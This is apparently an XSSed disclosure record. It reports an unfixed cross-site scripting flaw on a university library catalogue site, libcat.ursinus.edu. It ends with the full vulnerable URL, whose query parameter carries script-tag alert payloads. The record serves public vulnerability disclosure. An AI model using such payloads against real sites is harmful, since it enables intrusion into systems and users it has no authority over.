Unfixed XSS vulnerability at libcat.ursinus.edu

2008-07-10T00:00:00
ID XSSED:51957
Type xssed
Reporter skathgh420
Modified 2009-09-13T00:00:00

Description

Security researcher skathgh420 submitted a cross-site scripting (XSS) vulnerability affecting libcat.ursinus.edu on 07/10/2008. At the time of submission, the site ranked 296359 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/09/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://libcat.ursinus.edu/web2/tramp2.exe/form/guest?buttons=title%3Ddo_authority_search+search_button_easy%3DA_Title+index%3Dti&buttons=author%3Ddo_authority_search+search_button_easy%3DA_Author+index%3Dau&buttons=subject%3Ddo_authority_search+search_button_easy%3DA_Subject+index%3Dsu&buttons=keyword%3Ddo_ccl_search+search_button_easy%3DK_Keyword+index%3Ddefault&date_filter=all&language_filter=all&material_filter=all&servers=1home&setting_key=Myrin&hitlist_screen=HitList.html&record_screen=Record.html&button_clicked=author&query=<script>alert("iBlaze")<script>alert("iBlaze")</script><%2Fscript><script>alert("iBlaze")</script>